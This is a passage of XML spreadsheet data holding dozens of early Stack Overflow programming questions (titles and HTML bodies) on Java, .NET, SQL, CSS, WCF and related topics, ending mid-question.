    <t xml:space="preserve">&lt;p&gt;I'm giving a presentation to a Java User's Group on Groovy and I'm going to be doing some coding during the presentation to show some side-by-side Java/Groovy.  I really like the GroovyConsole as it's simple and I can resize the text easily.  &lt;/p&gt;
&lt;p&gt;I'm wondering if there is anything similar for Java?  I know I could just use Eclipse but I'd rather have a smaller app to use without having to customize a view.  What's the community got?&lt;/p&gt;
&lt;p&gt;Screen shot of GroovyConsole:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i.stack.imgur.com/GiR7b.jpg" alt="enter image description here"&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Avoiding repeated constants in CSS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any useful techniques for reducing the repetition of constants in a CSS file?&lt;/p&gt;
&lt;p&gt;(For example, a bunch of different selectors which should all apply the same colour, or the same font size)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>enter key to insert newline in asp.net multiline textbox control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some C# / asp.net code I inherited which has a textbox which I want to make multiline. I did so by adding textmode="multiline" but when I try to insert a newline, the enter key instead submits the form :P&lt;/p&gt;
&lt;p&gt;I googled around and it seems like the default behavior should be for enter (or control-enter) to insert a newline. Like I said I inherited the code so I'm not sure if there's javascript monkeying around or if there's just a simple asp.net thing I have to do.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.Net MVC: How do I enable dashes in my urls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to have dashes separate words in my URLs.  So instead of:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/MyController/MyAction
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/My-Controller/My-Action
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Moving from Visual Studio 2005 to 2008 and .NET 2.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently using VS2005 Profesional and .NET 2.0, and since our project is rather large (25 projects in the solution), I'd like to try VS 2008, since its theoretically faster with larger projects. &lt;/p&gt;
&lt;p&gt;Before doing such thing, i'd like to know if what I've read is true: can I use VS2008 in ".net 2.0" mode? I don't want my customers to install .net 3.0 or .3.5, I just want to install VS2008, open my solution and start working from there. &lt;/p&gt;
&lt;p&gt;Is this possible?&lt;/p&gt;
&lt;p&gt;P.D.: the solution is a c# Window Forms project.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does this javascript error mean? Permission denied to call method to Location.toString</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This error just started popping up all over our site.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Permission denied to call method to Location.toString&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I'm seeing google posts that suggest that this is related to flash and our crossdomain.xml.  What caused this to occur and how do you fix?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL Binary Log Replication: Can it be set to ignore errors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running a master-slave MySQL binary log replication system (phew!) that, for some data, is not in sync (meaning, the master holds more data than the slave). But the slave stops very frequently on the slightest MySQL error, can this be disabled? (perhaps a my.cnf setting for the replicating slave ignore-replicating-errors or some of the sort ;) )&lt;/p&gt;
&lt;p&gt;This is what happens, every now and then, when the slave tries to replicate an item that does not exist, the slave just dies. a quick check at &lt;strong&gt;SHOW SLAVE STATUS \G;&lt;/strong&gt; gives&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;       Slave-IO-Running: Yes
      Slave-SQL-Running: No
        Replicate-Do-DB: 
             Last-Errno: 1062
             Last-Error: Error 'Duplicate entry '15218' for key 1' on query. Default database: 'db'. Query: 'INSERT INTO db.table ( FIELDS ) VALUES ( VALUES )'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which I promptly fix (once I realize that the slave has been stopped) by doing the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;STOP SLAVE;
RESET SLAVE;
START SLAVE;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... lately this has been getting kind of tiresome, and before I spit out some sort of PHP which does this for me, i was wondering if there's some my.cnf entry which will not kill the slave on the first error.&lt;/p&gt;
&lt;p&gt;Cheers,&lt;/p&gt;
&lt;p&gt;/mp&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to unit test an object with database queries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've heard that unit testing is "totally awesome", "really cool" and "all manner of good things" but 70% or more of my files involve database access (some read and some write) and I'm not sure how to write a unit test for these files.&lt;/p&gt;
&lt;p&gt;I'm using PHP and Python but I think it's a question that applies to most/all languages that use database access.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Update Panel inside of a UserControl inside of a Repeater inside of another UpdatePanel</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Yes, it sounds crazy....It might be.&lt;/p&gt;
&lt;p&gt;The final updatepanel does not appear to trigger anything, it just refreshes the update panels and does not call back to the usercontrol hosting it.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
&lt;p&gt;EDIT: I got it posting back, however the controls inside the final usercontrol have lost their data...I'm thinking its because the main repeater is rebinding on each postback...Not sure where to take this one now.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Way to use Linq to Oracle</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can connect with the DataContext to the Oracle database however I get errors in running the query against the oracle database.  I looked at the SQL generated and it is for MSSQL and not Oracle PSQL.  &lt;/p&gt;
&lt;p&gt;Does anybody know of a decent easy to use wrapper to use LINQ against an Oracle Database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I authenticate using client credentials in WCF just once?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best approach to make sure you only need to authenticate once when using an API built on WCF?&lt;/p&gt;
&lt;p&gt;My current bindings and behaviors are listed below&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;	&amp;lt;bindings&amp;gt;
		&amp;lt;wsHttpBinding&amp;gt;
			&amp;lt;binding name="wsHttp"&amp;gt;
				&amp;lt;security mode="TransportWithMessageCredential"&amp;gt;
					&amp;lt;transport/&amp;gt;
					&amp;lt;message clientCredentialType="UserName" negotiateServiceCredential="false" establishSecurityContext="true"/&amp;gt;
				&amp;lt;/security&amp;gt;
			&amp;lt;/binding&amp;gt;
		&amp;lt;/wsHttpBinding&amp;gt;
	&amp;lt;/bindings&amp;gt;
	&amp;lt;behaviors&amp;gt;
		&amp;lt;serviceBehaviors&amp;gt;
			&amp;lt;behavior name="NorthwindBehavior"&amp;gt;
				&amp;lt;serviceMetadata httpGetEnabled="true"/&amp;gt;
				&amp;lt;serviceAuthorization principalPermissionMode="UseAspNetRoles"/&amp;gt;
				&amp;lt;serviceCredentials&amp;gt;
					&amp;lt;userNameAuthentication userNamePasswordValidationMode="MembershipProvider"/&amp;gt;
				&amp;lt;/serviceCredentials&amp;gt;
			&amp;lt;/behavior&amp;gt;
		&amp;lt;/serviceBehaviors&amp;gt;
	&amp;lt;/behaviors&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Next is what I am using in my client app to authenticate (currently I must do this everytime I want to make a call into WCF)&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim client As ProductServiceClient = New ProductServiceClient("wsHttpProductService")
client.ClientCredentials.UserName.UserName = "foo"
client.ClientCredentials.UserName.Password = "bar"
Dim ProductList As List(Of Product) = client.GetProducts()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I would like to do is auth w/ the API once using these credentials, then get some type of token for the period of time my client application is using the web service project.  I thought establishsecuritycontext=true did this for me?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to handle error logging</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Until recently I've been using &lt;code&gt;syslog&lt;/code&gt; in my &lt;code&gt;System_Exception&lt;/code&gt; exception handler to log important errors - a pretty useful concept I thought. However my host just cut me off, and it appears that loveable &lt;code&gt;syslog&lt;/code&gt; has actually been sending my error reports to everyone on the server (it's a shared server). They weren't too pleased.&lt;/p&gt;
&lt;p&gt;I've now switched to using a log.txt (and will now have to secure this with chmod or something) - but does anyone have any other suggestions for me to try? This seems a bit rusty.&lt;/p&gt;
&lt;p&gt;Oh, and don't use &lt;code&gt;syslog&lt;/code&gt; on anything except a dedicated server or somewhere that can handle it ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What control is this? ("Open" Button with Drop Down)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The "Open" button on the open file dialog used in certain windows applications includes a dropdown arrow with a list of additional options -- namely "Open with..".  &lt;/p&gt;
&lt;p&gt;I haven't seen this in every windows application, so you may have to try a few to get it, but SQL Server Management Studio and Visual Studio 2005 will both show the button that way if you go to the menu and choose &lt;em&gt;File-&gt;Open-&gt;File...&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I want to use a button like this with a built-in list in one of my applications, but I can't find the control they're using anywhere in visual studio.  I should clarify that I'm looking for that specific button, not the entire dialog.  Any thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing a Component on an inherited form from the base form</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A number of forms in my project inherit from a base form. It is easy to get at the Controls collection of the derived forms, but I have not found a simple way to access the Components collection, since VS marks this as private. &lt;/p&gt;
&lt;p&gt;I assume this could be done with reflection, but I'm not really sure how best to go about it, not having worked with reflection before.&lt;/p&gt;
&lt;p&gt;Right now, I'm using a sort of clunky workaround, in which I override a function GetComponents and return an array of the components I'm interested in. This is obviously prone to errors, since it's easy to forget to implement the overridden function or update it when components are added.&lt;/p&gt;
&lt;p&gt;If anyone has any tips or can suggest a better way, I'd be glad to hear.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Outlook synchronization on multiple machines</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;i&gt;This isn't much of a programming question, but I'm sure I'm not the only person here who has this issue.&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;Currently I have two machines with Outlook 2007. They both sync e-mail from Google Apps. One of the machines publishes my calendar to a secure server, which my other machine is subscribed to. The problem with this setup is that I have read-only calendar access on one of my machines, which sucks. Also soon I'll be upgrading to a smart-phone, so anything I do will also have to support that scenario.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Is there a better way to handle Outlook synchronization without setting up an exchange server in my basement?&lt;/li&gt;
&lt;li&gt;If I have to setup Exchange, is it possible to make it pull e-mail, via IMAP, from Google Apps?&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Content Type for MHT files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the content type for MHT files?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Profile a rails controller action</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to profile a controller action in Ruby on Rails. Currently I am using the brute-force method of throwing in &lt;code&gt;puts Time.now&lt;/code&gt; calls between what I think will be a bottleneck. But that feels really, really dirty. There has got to be a better way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do threads work in Python, and what are common Python-threading specific pitfalls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to wrap my head around how threads work in Python, and it's hard to find good information on how they operate. I may just be missing a link or something, but it seems like the official documentation isn't very thorough on the subject, and I haven't been able to find a good write-up.&lt;/p&gt;
&lt;p&gt;From what I can tell, only one thread can be running at once, and the active thread switches every 10 instructions or so?&lt;/p&gt;
&lt;p&gt;Where is there a good explanation, or can you provide one? It would also be very nice to be aware of common problems that you run into while using threads with Python.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a reason to use BufferedReader over InputStreamReader when reading all characters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I currently use the following function to do a simple HTTP GET.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static String download(String url) throws java.io.IOException {
    java.io.InputStream s = null;
    java.io.InputStreamReader r = null;
    //java.io.BufferedReader b = null;
    StringBuilder content = new StringBuilder();
    try {
        s = (java.io.InputStream)new URL(url).getContent();
        r = new java.io.InputStreamReader(s);
        //b = new java.io.BufferedReader(r);
        char[] buffer = new char[4*1024];
        int n = 0;
        while (n &amp;gt;= 0) {
            n = r.read(buffer, 0, buffer.length);
            if (n &amp;gt; 0) {
                content.append(buffer, 0, n);
            }
        }
    }
    finally {
        //if (b != null) b.close();
        if (r != null) r.close();
        if (s != null) s.close();
    }
    return content.toString();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I see no reason to use the &lt;code&gt;BufferedReader&lt;/code&gt; since I am just going to download everything in sequence. Am I right in thinking there is no use for the &lt;code&gt;BufferedReader&lt;/code&gt; in this case?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio 2008 debugging issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working in VS 2008 and have three projects in one solution.  I'm debugging by attaching to a .net process invoked by a third party app (SalesLogix, a CRM app).  &lt;/p&gt;
&lt;p&gt;Once it has attached to the process and I attempt to set a breakpoint in one of the projects, it doesn't set a breakpoint in that file.  It actually switches the current tab to another file in another project and sets a breakpoint in that document.  If the file isn't open, it even goes so far as to open it for me.  I can't explain this.  I've got no clue.  Anyone seen such odd behavior?  I wouldn't believe it if I wasn't seeing it myself.&lt;/p&gt;
&lt;p&gt;A little more info: if I set a breakpoint before attaching, it shows the "red dot" and says no symbols loaded...no problem...I expect that.  When I attach and invoke my .net code from SalesLogix and switch back to VS, my breakpoint is completely gone (not even a warning that the source doesn't match the debug file).  When I attempt to manually load the debug file, then I get a message that the symbol file does not match the module.  The .pdb and the .dll are timestamped the same, so I'm stumped.&lt;/p&gt;
&lt;p&gt;Anyone have any ideas?&lt;/p&gt;
&lt;p&gt;Thx,&lt;/p&gt;
&lt;p&gt;Jeff&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How stable is WPF?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How stable is WPF not in terms of stability of a WPF program, but in terms of the 'stability' of the API itself.  &lt;/p&gt;
&lt;p&gt;Let me explain:  &lt;/p&gt;
&lt;p&gt;Microsoft is notorious for changing its whole methodology around with new technology. Like with the move from silverlight 1 to silverlight 2. With WPF, I know that MS changed a bunch of stuff with the release of the .NET service pack. I don't know how much they changed things around. So the bottom line is, in your opinion are they going to revamp the system again with the next release or do you think that it is stable enough now that they won't change the bulk of the system. I hate to have to unlearn stuff with every release.  &lt;/p&gt;
&lt;p&gt;I hope that the question wasn't too long winded.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do indexes work with "IN" clause</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If I have a query like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Select EmployeeId 
From Employee 
Where EmployeeTypeId IN (1,2,3)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I have an index on the &lt;code&gt;EmployeeTypeId&lt;/code&gt; field, does SQL server still use that index?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How many ServiceContracts can a WCF service have?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How many ServiceContracts can a WCF service have?&lt;/p&gt;
&lt;p&gt;Specifically, since a ServiceContract is an attribute to an interface, how many interfaces can I code into one WCF web service? Is it a one-to-one?&lt;/p&gt;
&lt;p&gt;Does it make sense to separate the contracts across multiple web services?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to respond to an alternate URI in a RESTful web service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm building a RESTful web service which has multiple URIs for one of its resources, because there is more than one unique identifier. Should the server respond to a GET request for an alternate URI by returning the resource, or should I send an HTTP 3xx redirect to the canonical URI? Is &lt;em&gt;HTTP 303 (see also)&lt;/em&gt; the most appropriate redirect?&lt;/p&gt;
&lt;p&gt;Clarification: the HTTP specification makes it clear that the choice of redirect depends on which URI future requests should use. In my application, the 'canonical' URI is the most stable of the alternatives; an alternative URI will always direct to same canonical URI, or become invalid.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java Logging vs Log4J</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it still worth to add the log4j library to a Java 5 project just to log
let's say some exceptions to a file with some nice rollover settings.
Or will the standard util.logging facility do the job as well?&lt;/p&gt;
&lt;p&gt;What do you think?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>using a html entity in xslt (e.g. &amp;nbsp;)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to include an html entity in XSLT?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;xsl:template match="/a/node"&amp;gt;
    &amp;lt;xsl:value-of select="."/&amp;gt;
    &amp;lt;xsl:text&amp;gt;&amp;amp;nbsp;&amp;lt;/xsl:text&amp;gt;
&amp;lt;/xsl:template&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;this one returns a &lt;strong&gt;XsltParseError&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sending e-mail from a Custom SQL Server Reporting Services Delivery Extension</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've developed my own delivery extension for Reporting Services 2005, to integrate this with our SaaS marketing solution.&lt;/p&gt;
&lt;p&gt;It takes the subscription, and takes a snapshot of the report with a custom set of parameters. It then renders the report, sends an e-mail with a link and the report attached as XLS.&lt;/p&gt;
&lt;p&gt;Everything works fine, until mail delivery...&lt;/p&gt;
&lt;p&gt;Here's my code for sending e-mail:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; public static List&amp;lt;string&amp;gt; SendMail(SubscriptionData data, Stream reportStream, string reportName, string smptServerHostname, int smtpServerPort)
{
  List&amp;lt;string&amp;gt; failedRecipients = new List&amp;lt;string&amp;gt;();
  MailMessage emailMessage = new MailMessage(data.ReplyTo, data.To);
  emailMessage.Priority = data.Priority;
  emailMessage.Subject = data.Subject;
  emailMessage.IsBodyHtml = false;
  emailMessage.Body = data.Comment;
  if (reportStream != null)
  {
    Attachment reportAttachment = new Attachment(reportStream, reportName);
    emailMessage.Attachments.Add(reportAttachment);
    reportStream.Dispose();
  }
  try
  {
    SmtpClient smtp = new SmtpClient(smptServerHostname, smtpServerPort);
    // Send the MailMessage
    smtp.Send(emailMessage);
  }
  catch (SmtpFailedRecipientsException ex)
  {
    // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List
    failedRecipients.Add(ex.FailedRecipient);
  }
  catch (SmtpFailedRecipientException ex)
  {
    // Delivery failed for the recipient. Add the e-mail address to the failedRecipients List
    failedRecipients.Add(ex.FailedRecipient);
  }
  catch (SmtpException ex)
  {
    throw ex;
  }
  catch (Exception ex)
  {
    throw ex;
  }
  // Return the List of failed recipient e-mail addresses, so the client can maintain its list.
  return failedRecipients;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Values for SmtpServerHostname is localhost, and port is 25.&lt;/p&gt;
&lt;p&gt;I veryfied that I can actually send mail, by using Telnet. And it works.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Here's the error message I get from SSRS:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;ReportingServicesService!notification!4!08/28/2008-11:26:17:: Notification 6ab32b8d-296e-47a2-8d96-09e81222985c completed.  Success: False, Status: Exception Message: Failure sending mail. Stacktrace:    at MyDeliveryExtension.MailDelivery.SendMail(SubscriptionData data, Stream reportStream, String reportName, String smptServerHostname, Int32 smtpServerPort) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MailDelivery.cs:line 48
   at MyDeliveryExtension.MyDelivery.Deliver(Notification notification) in C:\inetpub\wwwroot\CustomReporting\MyDeliveryExtension\MyDelivery.cs:line 153, DeliveryExtension: My Delivery, Report: Clicks Development, Attempt 1
ReportingServicesService!dbpolling!4!08/28/2008-11:26:17:: NotificationPolling finished processing item 6ab32b8d-296e-47a2-8d96-09e81222985c&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Could this have something to do with Trust/Code Access Security?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;My delivery extension is granted full trust in rssrvpolicy.config:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;   &amp;lt;CodeGroup 
    class="UnionCodeGroup"
    version="1"
    PermissionSetName="FullTrust"
    Name="MyDelivery_CodeGroup"
    Description="Code group for MyDelivery extension"&amp;gt;
    &amp;lt;IMembershipCondition class="UrlMembershipCondition" version="1" Url="C:\Program Files\Microsoft SQL Server\MSSQL.2\Reporting Services\ReportServer\bin\MyDeliveryExtension.dll" /&amp;gt;
   &amp;lt;/CodeGroup&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Could trust be an issue here?&lt;/p&gt;
&lt;p&gt;Another theory: SQL Server and SSRS was installed in the security context of Local System. Am I right, or is this service account restricted access to any network resource? Even its own SMTP Server?&lt;/p&gt;
&lt;p&gt;I tried changing all SQL Server Services logons to Administrator - but still without any success.&lt;/p&gt;
&lt;p&gt;I also tried logging onto the SMTP server in my code, by proviiding: NetworkCredential("Administrator", "password") and also NetworkCredential("Administrator", "password", "MyRepServer")&lt;/p&gt;
&lt;p&gt;Can anyone help here, please?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - SQLClient - Simplest INSERT</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm basically trying to figure out the simplest way to perform your basic insert operation in C#.NET using the SqlClient namespace. &lt;/p&gt;
&lt;p&gt;I'm using &lt;code&gt;SqlConnection&lt;/code&gt; for my db link, I've already had success executing some reads, and I want to know the simplest way to insert data. I'm finding what seem to be pretty verbose methods when I google.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is regex case insensitivity slower?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://twitter.com/codinghorror/statuses/901272685"&gt;Source&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;RegexOptions.IgnoreCase is more expensive than I would have thought (eg, should be barely measurable)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Assuming that this applies to PHP, Python, Perl, Ruby etc as well as C# (which is what I assume Jeff was using), how much of a slowdown is it and will I incur a similar penalty with "/[a-zA-z]/" as I will with "/[a-z]/i" ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is soapUI the best web services testing tool/client/framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been working on a web services related project for about the last year.  Our team found &lt;a href="http://www.soapui.org"&gt;soapUI&lt;/a&gt; near the start of our project and we have been &lt;em&gt;mostly&lt;/em&gt;(*) satisfied with it (the free version, that is).&lt;/p&gt;
&lt;p&gt;My question is: are there other tools/clients/frameworks that you have used/currently use for web services testing and would recommend?&lt;/p&gt;
&lt;p&gt;(*) There are some weird GUI glitches that appear once in a while.  As is mentioned by some of the answers, we attributed this to a memory leak.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the simplest SQL Query to find the second largest value?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the simplest SQL query to find the second largest integer value in a specific column? &lt;/p&gt;
&lt;p&gt;There are maybe duplicate values in the column.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sending email in .NET through Gmail</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Instead of relying on my host to send email, I was thinking of sending the messages though my Gmail account. The emails are personalized emails to the bands I play on my show. Is it possible to do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Passing null to a method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in the middle of reading the excellent &lt;a href="http://rads.stackoverflow.com/amzn/click/0132350882"&gt;Clean Code&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;One discussion is regarding passing nulls into a method.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MetricsCalculator {
    public double xProjection(Point p1, Point p2) {
        return (p2.x - p1.x) * 1.5;
    }
}
...
calculator.xProjection(null, new Point(12,13));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It represents different ways of handling this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public double xProjection(Point p1, Point p2) {
    if (p1 == null || p2 == null) {
        throw new IllegalArgumentException("Invalid argument for xProjection");
    }
    return (p2.x - p1.x) * 1.5;
}
public double xProjection(Point p1, Point p2) {
    assert p1 != null : "p1 should not be null";
    assert p2 != null : "p2 should not be null";
    return (p2.x - p1.x) * 1.5;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I prefer the &lt;a href="http://java.sun.com/j2se/1.4.2/docs/guide/lang/assert.html"&gt;assertions&lt;/a&gt; approach, but I don't like the fact that assertions are turned off by default.&lt;/p&gt;
&lt;p&gt;The book finally states:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;In most programming languages there is no good way to deal with a null that is passed by a caller accidentally. Because this is the case, the rational approach is to forbid passing null by default.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It doesn't really go into how you would enforce this restriction?&lt;/p&gt;
&lt;p&gt;Do any of you have strong opinions either way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>1:1 Foreign Key Constraints</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you specify that a foreign key constraint should be a 1:1 relationship in transact sql? Is declaring the column UNIQUE enough? Below is my existing code.!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE [dbo].MyTable(
    [MyTablekey] INT IDENTITY(1,1) NOT FOR REPLICATION NOT NULL,
    [OtherTableKey] INT NOT NULL UNIQUE
        CONSTRAINT [FK_MyTable_OtherTable] FOREIGN KEY REFERENCES [dbo].[OtherTable]([OtherTableKey]),
    ...
    CONSTRAINT [PK_MyTable] PRIMARY KEY CLUSTERED 
    (
        [MyTableKey] ASC
    ) WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]
GO
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Get the DefaultView DataRowView from a DataRow</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here's the situation:  I need to bind a WPF &lt;code&gt;FixedPage&lt;/code&gt; against a &lt;code&gt;DataRow&lt;/code&gt;.  Bindings don't work against &lt;code&gt;DataRows&lt;/code&gt;; they work against &lt;code&gt;DataRowViews&lt;/code&gt;.  I need to do this in the most generic way possible, as I know nothing about and have no control over what is in the &lt;code&gt;DataRow&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;What I need is to be able to get a &lt;code&gt;DataRowView&lt;/code&gt; for a given &lt;code&gt;DataRow&lt;/code&gt;.  I can't use the &lt;code&gt;Find()&lt;/code&gt; method on the &lt;code&gt;DefaultView&lt;/code&gt; because that takes a key, and there is no guarantee the table will have a primary key set.&lt;/p&gt;
&lt;p&gt;Does anybody have a suggestion as to the best way to go around this?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternative "architectural" approaches to javaScript client code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is your javaScript code organized? Does it follow patterns like MVC, or something else? &lt;/p&gt;
&lt;p&gt;I've been working on a side project for some time now, and the further I get, the more my webpage has turned into a full-featured application. Right now, I'm sticking with &lt;a href="http://jquery.com"&gt;jQuery&lt;/a&gt;, however, the logic on the page is growing to a point where some organization, or dare I say it, "architecture" is needed. My first approach is "MVC-ish":&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The 'model' is a JSON tree that gets extended with helpers&lt;/li&gt;
&lt;li&gt;The view is the DOM plus classes that tweak it&lt;/li&gt;
&lt;li&gt;The controller is the object where I connect events handling and kick off view or model manipulation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I'm very interested, however, in how other people have built more substantial javaScript apps. I'm not interested in GWT, or other server-oriented approaches... just in the approach of "javaScript + &amp;lt;generic web service-y thingy here&amp;gt;"&lt;/p&gt;
&lt;p&gt;Note: earlier I said javaScript "is not really OO, not really functional". This, I think, distracted everyone. Let's put it this way, because javaScript is unique in many ways, and I'm coming from a strongly-typed background, I don't want to force paradigms I know but were developed in very different languages.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does ReadUncommitted imply NoLock</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When writing a SQL statement in SQL Server 2005, does the READUNCOMMITTED query hint imply NOLOCK or do I have to specify it manually too?&lt;/p&gt;
&lt;p&gt;So is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;With (NoLock, ReadUnCommitted)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the same as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;With (ReadUnCommitted)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to make 'pretty urls' work in php hosted in IIS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there some way I can use urls like: &lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;a href="http://www.blog.com/team-spirit/" rel="nofollow"&gt;http://www.blog.com/team-spirit/&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;instead of&lt;/p&gt;
